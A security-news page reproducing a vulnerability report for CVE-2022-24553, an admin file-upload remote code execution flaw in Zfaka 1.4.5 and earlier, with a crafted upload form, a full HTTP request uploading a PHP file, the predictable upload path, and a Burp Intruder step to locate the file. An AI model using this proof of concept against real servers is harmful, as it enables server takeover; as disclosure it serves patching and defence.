Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-24553: Zfaka Backend RCE(All version) · Issue #260 · zfaka-plus/zfaka

An issue was found in Zfaka <= 1.4.5. The verification of the background file upload function check is not strict, resulting in remote command execution.

CVE
#web#windows#apple#js#git#java

in the background file upload, Zfaka only has one JS check in \public\res\layui\lay\modules\upload.js

there is no filtering for the file extension, and there is only one front-end JS verification, So disabling JS can directly implement the background rce

image-20210526205833957

The controller of upload in the background is located in \application\modules\Admin\controllers\Products.php

The upload path will not be returned after the file is uploaded, but we already know the upload path and the naming rules of the uploaded file

image-20210526204139761

UPLOAD_ Path is defined as follows

define(‘UPLOAD_PATH’, APP_PATH.’/public/res/upload/’);

CUR_ Date is defined as follows

define('CUR_DATE’, date(‘Y-m-d’));

file name

$filename=date(“His”); // Hour + minute + second

Taking 21:05 as an example, the output results are as follows

image-20210526210650296

Take 21:05:44 on May 26, 2021 as an example

The full file path is

http://www.xxx.com/res/upload/2021-05-26/210444.php

Construct form directly

<meta charset="utf-8">

<form action=" http://xxx.top/Admin/products/imgurlajax " method="post" enctype="multipart/form-data">

<label for="file">File:</label>

<input type="file" name="file" id="file" />

<input type="text" name="pid" id="pid" /> <–! Remember to modify the PID to the ID of the commodity (you can get it by selecting the commodity packet capture in the background) - > < / -! >

<input type="submit" value="Upload" />

</form>

At the same time, you need to add referers: http://xxx.top/Admin/products/imgurl/?id=1 , and modify the

Otherwise, “please select product ID” will be prompted

Finally, the complete upload HTTP request is as follows

POST http://xxx.top/Admin/products/imgurlajax HTTP/1.1

Host: xxxx

Content-Length: 291

Accept: application/json, text/javascript, */*; q=0.01

DNT: 1

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeSrhtSPGxub0H0eb

Origin: http://47.105.132.207

Referer: http://xxx.top/Admin/products/imgurl/?id=12

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh; q=0.9,en; q=0.8

Cookie: PHPSESSID=ql4ep5uk8cf9i0rvihrruuilaq

Connection: close

------WebKitFormBoundaryeSrhtSPGxub0H0eb

Content-Disposition: form-data; name="file"; filename="test.php"

Content-Type: image/png

<? php

phpinfo();

------WebKitFormBoundaryeSrhtSPGxub0H0eb

Content-Disposition: form-data; name="pid"

12

------WebKitFormBoundaryeSrhtSPGxub0H0eb–

Direct upload succeeded

Then run the last seconds with burpsuite intruder

After all, the number of seconds can’t be so accurate

image-20210526212753095

image-20210526233749316

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907